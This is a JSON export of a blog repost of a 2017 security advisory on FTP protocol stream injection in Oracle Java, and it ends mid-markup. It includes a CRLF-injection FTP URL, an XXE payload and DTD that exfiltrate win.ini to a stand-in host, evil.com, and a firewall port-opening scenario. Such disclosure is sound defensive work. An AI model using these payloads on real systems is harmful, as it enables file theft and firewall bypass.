{"id":6710,"date":"2017-02-21T14:19:17","date_gmt":"2017-02-21T22:19:17","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/02\/21\/news-527\/"},"modified":"2017-02-21T15:03:30","modified_gmt":"2017-02-21T23:03:30","slug":"news-527","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/02\/21\/news-527\/","title":{"rendered":"SSD Advisory \u2013 Oracle Java FTP Stream Injection"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 21 Feb 2017 13:51:34 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a FTP protocol stream injection vulnerability found in Oracle Java. Java is a general-purpose computer programming language that is concurrent, class-based, object-oriented, and specifically designed to have as few implementation dependencies as possible. It is intended to let application developers &#8220;write once, run anywhere&#8221; (WORA).<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We have reported this vulnerability to Oracle, and have been waiting for several months for a patch for this vulnerability. Another researcher has discovered this vulnerability and went public with it &#8211; at which point we decided to publish the information without waiting for Oracle to release a patch.<\/p>\n<p><span id=\"more-3029\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> Java is vulnerable to an FTP protocol stream injection via malicious URLs. If an attacker can cause Java application to retrieve a malicious URL of this type, then the attacker can inject FTP commands into the client&#8217;s protocol stream.<\/p>\n<p>For example, the following URL allows for new lines (CRLF) to be injected in the TCP stream, making the receiving server think that &#8220;<em>NEW COMMAND<\/em>&#8221; is a separate command sent by the client:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448574093867676\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  ftp:\/\/x:inject%0d%0aNEW%20COMMAND@example.com\/file.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>The above URL, when fetched by Java, causes the following partial command sequence to be sent:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce44857e328120746\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt;&#8212;  USER x  PASS inject  NEW COMMAND  TYPE I  EPSV ALL  PASV  &#8230;  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44857e328120746-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44857e328120746-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44857e328120746-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44857e328120746-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44857e328120746-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44857e328120746-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44857e328120746-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44857e328120746-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44857e328120746-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce44857e328120746-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44857e328120746-2\"><span class=\"crayon-i\">USER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">x<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44857e328120746-3\"><span class=\"crayon-e\">PASS <\/span><span class=\"crayon-e\">inject<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44857e328120746-4\"><span class=\"crayon-r\">NEW<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">COMMAND<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44857e328120746-5\"><span class=\"crayon-i\">TYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">I<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44857e328120746-6\"><span class=\"crayon-e\">EPSV <\/span><span class=\"crayon-e\">ALL<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44857e328120746-7\"><span class=\"crayon-i\">PASV<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44857e328120746-8\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44857e328120746-9\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>Java is vulnerable to this injection via multiple fields in the URL. The username field and the directory path specified in the URL. <\/p>\n<p>There are 2 main scenarios to exploit the vulnerability:<\/p>\n<ol>\n<li>XML External Entity (XXE) Exfiltration<\/li>\n<li>Opening Ports in the Firewall<\/li>\n<\/ol>\n<p><u>Attack Scenario 1: XML External Entity (XXE) Exfiltration<\/u><\/p>\n<p>If an application is vulnerable to XML External Entity (XXE), then this makes it easier to successfully use Out-Of-Band (OOB) exfiltration of file contents and similar data. An example for a hypothetical attack:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448581857458227\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt;&#8212;  &lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;   &lt;!DOCTYPE roottag [     &lt;!ENTITY % file SYSTEM &#8220;file:\/\/\/c:\/windows\/win.ini&#8221;&gt;     &lt;!ENTITY % dtd SYSTEM &#8220;http:\/\/evil.com\/evil.dtd&#8221;&gt;   %dtd;]&gt;  &lt;roottag&gt;&amp;send;&lt;\/roottag&gt;  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448581857458227-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448581857458227-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448581857458227-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448581857458227-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448581857458227-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448581857458227-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448581857458227-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448581857458227-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448581857458227-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448581857458227-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448581857458227-2\"><span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448581857458227-3\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">DOCTYPE <\/span><span class=\"crayon-i\">roottag<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448581857458227-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">ENTITY<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;file:\/\/\/c:\/windows\/win.ini&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448581857458227-5\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">ENTITY<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dtd <\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/evil.com\/evil.dtd&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448581857458227-6\"><span class=\"crayon-ta\">%<\/span><span class=\"crayon-v\">dtd<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448581857458227-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448581857458227-8\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">roottag<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">send<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">roottag<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448581857458227-9\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0048 seconds] -->  <\/p>\n<p>In this example, the file located at <em>http:\/\/evil.com\/evil.dtd<\/em> would contain:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448584172822042\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212;8&lt;&#8212;  &lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;  &lt;!ENTITY % all &#8220;&lt;!ENTITY send SYSTEM &#8216;ftp:\/\/user:%file;@evil.com\/x&#8217;&gt;&#8221;&gt;%all;  &#8212;&gt;8&#8212;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448584172822042-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448584172822042-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448584172822042-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448584172822042-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448584172822042-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448584172822042-2\"><span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;UTF-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448584172822042-3\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">ENTITY<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">all<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&lt;!ENTITY send SYSTEM &#8216;ftp:\/\/user:%file;@evil.com\/x&#8217;&gt;&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">all<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448584172822042-4\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>This would cause the contents of the <em>win.ini<\/em> file to be sent to the attacker&#8217;s FTP server as part of the <em>PASS<\/em> command. While similar attacks have been demonstrated with <em>HTTP<\/em> URLs previously, this is useful because Java&#8217;s <em>HTTP<\/em> URL validation has become more strict in recent years and will not allow many special characters in URLs that used to be allowed in previous versions. The FTP URL handler is far more lax, particularly in the password field.<\/p>\n<p><u>Attack Scenario 2: Opening Ports in the Firewall<\/u><\/p>\n<p>If an attacker can cause victim system to fetch an FTP URL with Java, and the victim&#8217;s firewall supports classic, non-passive FTP inspection and translation, then this attack can be conducted:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448595165230146\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/www.enyo.de\/fw\/security\/java-firewall\/     The firewall can be tricked into thinking a legitimate client wants an arbitrary port (under the attacker&#8217;s control), to be opened &#8211; this is normally done to allow the remote FTP server to send a data stream back. In our version of the attack, no Java applet is required.    In a simple version of this attack, we could simply inject a malicious &lt;em&gt;PORT&lt;\/em&gt; command into the stream at the right moment. When the firewall sees this, it will translate the internal IP address and port for that command into an external address and port, and then enable a temporary &lt;em&gt;NAT&lt;\/em&gt; rule to allow a single TCP connection to come back in, relaying it to the client.    Suppose that the victim Java client host has address &lt;em&gt;10.1.2.3&lt;\/em&gt;, the victim firewall has an external IP address of &lt;em&gt;8.14.14.15&lt;\/em&gt; and our attacker is at &lt;em&gt;evil.com&lt;\/em&gt;. Then we should expect this FTP URL to fool the firewall into opening up port 2000:<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448595165230146-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448595165230146-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448595165230146-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448595165230146-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448595165230146-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448595165230146-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448595165230146-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448595165230146-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/www.enyo.de\/fw\/security\/java-firewall\/ <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448595165230146-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448595165230146-3\"><span class=\"crayon-e\">The <\/span><span class=\"crayon-e\">firewall <\/span><span class=\"crayon-e\">can <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-e\">tricked <\/span><span class=\"crayon-e\">into <\/span><span class=\"crayon-i\">thinking<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">legitimate <\/span><span class=\"crayon-e\">client <\/span><span class=\"crayon-e\">wants <\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">arbitrary <\/span><span class=\"crayon-e\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">under <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-i\">attacker<\/span>&#8216;<span class=\"crayon-i\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">control<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">be <\/span><span class=\"crayon-v\">opened<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">normally <\/span><span class=\"crayon-e\">done <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">allow <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">remote <\/span><span class=\"crayon-e\">FTP <\/span><span class=\"crayon-e\">server <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">send<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">data <\/span><span class=\"crayon-e\">stream <\/span><span class=\"crayon-v\">back<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span 